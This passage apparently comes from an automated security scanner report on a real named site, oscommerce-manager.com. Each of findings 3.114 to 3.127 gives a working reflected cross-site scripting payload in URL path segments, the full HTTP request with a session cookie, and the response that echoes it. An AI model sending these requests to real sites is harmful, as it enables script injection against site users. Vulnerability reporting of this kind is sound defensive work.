Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/aggregator/style995f5"><script>alert(1)</script>a0c6474d956/customer_testimonials.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.114. http://www.oscommerce-manager.com/modules/aggregator/style/customer_testimonials.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/aggregator/style/customer_testimonials.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ebfc"><script>alert(1)</script>470968f84d8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/aggregator/style/customer_testimonials.css1ebfc"><script>alert(1)</script>470968f84d8?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/aggregator/style/customer_testimonials.css1ebfc"><script>alert(1)</script>470968f84d8?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.115. http://www.oscommerce-manager.com/modules/book/book.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/book/book.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d98c"><script>alert(1)</script>b4b89e17f6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules6d98c"><script>alert(1)</script>b4b89e17f6a/book/book.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules6d98c"><script>alert(1)</script>b4b89e17f6a/book/book.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.116. http://www.oscommerce-manager.com/modules/book/book.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/book/book.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8db62"><script>alert(1)</script>404afc2e942 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/book8db62"><script>alert(1)</script>404afc2e942/book.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/book8db62"><script>alert(1)</script>404afc2e942/book.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.117. http://www.oscommerce-manager.com/modules/book/book.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/book/book.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98755"><script>alert(1)</script>756dc892b26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/book/book.css98755"><script>alert(1)</script>756dc892b26?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/book/book.css98755"><script>alert(1)</script>756dc892b26?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.118. http://www.oscommerce-manager.com/modules/fckeditor/fckeditor.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/fckeditor/fckeditor.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4d1e"><script>alert(1)</script>568ef29fa29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modulesb4d1e"><script>alert(1)</script>568ef29fa29/fckeditor/fckeditor.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modulesb4d1e"><script>alert(1)</script>568ef29fa29/fckeditor/fckeditor.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.119. http://www.oscommerce-manager.com/modules/fckeditor/fckeditor.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/fckeditor/fckeditor.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8b60"><script>alert(1)</script>c46cf9ef0fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/fckeditora8b60"><script>alert(1)</script>c46cf9ef0fe/fckeditor.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/fckeditora8b60"><script>alert(1)</script>c46cf9ef0fe/fckeditor.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.120. http://www.oscommerce-manager.com/modules/fckeditor/fckeditor.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/fckeditor/fckeditor.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78a30"><script>alert(1)</script>484cc22110d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/fckeditor/fckeditor.css78a30"><script>alert(1)</script>484cc22110d?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:07 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/fckeditor/fckeditor.css78a30"><script>alert(1)</script>484cc22110d?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.121. http://www.oscommerce-manager.com/modules/lightbox2/css/lightbox.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/css/lightbox.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19527"><script>alert(1)</script>66a5488c9ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules19527"><script>alert(1)</script>66a5488c9ea/lightbox2/css/lightbox.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules19527"><script>alert(1)</script>66a5488c9ea/lightbox2/css/lightbox.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.122. http://www.oscommerce-manager.com/modules/lightbox2/css/lightbox.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/css/lightbox.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17f01"><script>alert(1)</script>dcd70175ca0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/lightbox217f01"><script>alert(1)</script>dcd70175ca0/css/lightbox.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:58 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/lightbox217f01"><script>alert(1)</script>dcd70175ca0/css/lightbox.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.123. http://www.oscommerce-manager.com/modules/lightbox2/css/lightbox.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/css/lightbox.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb10a"><script>alert(1)</script>71a3c70d3e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/lightbox2/cssbb10a"><script>alert(1)</script>71a3c70d3e9/lightbox.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/lightbox2/cssbb10a"><script>alert(1)</script>71a3c70d3e9/lightbox.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.124. http://www.oscommerce-manager.com/modules/lightbox2/css/lightbox.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/css/lightbox.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 761d0"><script>alert(1)</script>1b47fb348be was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/lightbox2/css/lightbox.css761d0"><script>alert(1)</script>1b47fb348be?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/lightbox2/css/lightbox.css761d0"><script>alert(1)</script>1b47fb348be?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.125. http://www.oscommerce-manager.com/modules/lightbox2/js/auto_image_handling.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/js/auto_image_handling.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77c9e"><script>alert(1)</script>f530f647a18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules77c9e"><script>alert(1)</script>f530f647a18/lightbox2/js/auto_image_handling.js?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules77c9e"><script>alert(1)</script>f530f647a18/lightbox2/js/auto_image_handling.js?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.126. http://www.oscommerce-manager.com/modules/lightbox2/js/auto_image_handling.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/js/auto_image_handling.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5d83"><script>alert(1)</script>a9586df36a6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/lightbox2d5d83"><script>alert(1)</script>a9586df36a6/js/auto_image_handling.js?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/lightbox2d5d83"><script>alert(1)</script>a9586df36a6/js/auto_image_handling.js?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.127. http://www.oscommerce-manager.com/modules/lightbox2/js/auto_image_handling.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/js/auto_image_handling.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6363"><script>alert(1)</script>1aac51cff8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/lightbox2/jsf6363"><script>alert(1)</script>1aac51cff8/auto_image_handling.js?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:21 GMT
